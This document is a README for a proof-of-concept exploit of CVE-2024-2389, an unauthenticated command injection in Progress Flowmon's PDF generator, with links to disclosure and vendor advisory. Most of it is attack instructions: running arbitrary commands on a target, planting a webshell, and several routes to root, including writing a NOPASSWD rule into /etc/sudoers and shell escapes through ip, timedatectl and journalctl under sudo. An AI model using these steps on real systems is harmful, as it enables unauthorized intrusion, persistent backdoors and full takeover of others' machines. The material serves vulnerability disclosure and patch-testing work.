CVE-2024-2389

CVE-2024-2389: Progress Software Flowmon Unauthenticated Command Injection

Information

Description: This exploits an unauthenticated command injection in the Progress Software Flowmon application.
Versions Affected: Tested on v12.03.02
Version Fixed: 12.3.5/11.1.14
Researcher: Dave Yesland (https://x.com/daveysec)
Disclosure Link: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-2389
Vendor Advisory: https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

Proof-of-Concept Exploit

Description

This exploit a command injection flaw in an unauthenticated PDF generator endpoint affecting PdfGenerator.php.

Usage/Exploitation

To run a blind command:
python3 CVE-2024-2389 --cmd 'curl a.server' TARGET

To write a simple webshell:
python3 CVE-2024-2389 --web-shell TARGET
Then visit TARGET/rce.php

A root shell can be obtained through several methods:

cp /var/www/shtml/index.php /tmp/index.php.bak;
echo '<?php system("echo \"ADMINS ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers"); ?>' > /var/www/shtml/index.php;
sudo /usr/bin/php /var/www/shtml/index.php Cli\:AddNewSource s;
cp /tmp/index.php.bak /var/www/shtml/index.php;

# ip command:
sudo ip netns add foo
sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar
sudo ip netns exec bar /bin/bash
sudo ip netns delete foo
sudo ip netns delete bar

# Abusing the timedatectl command:
sudo timedatectl list-timezones
!/bin/bash

#Abusing journalctl
sudo journalctl
!/bin/bash

Screenshot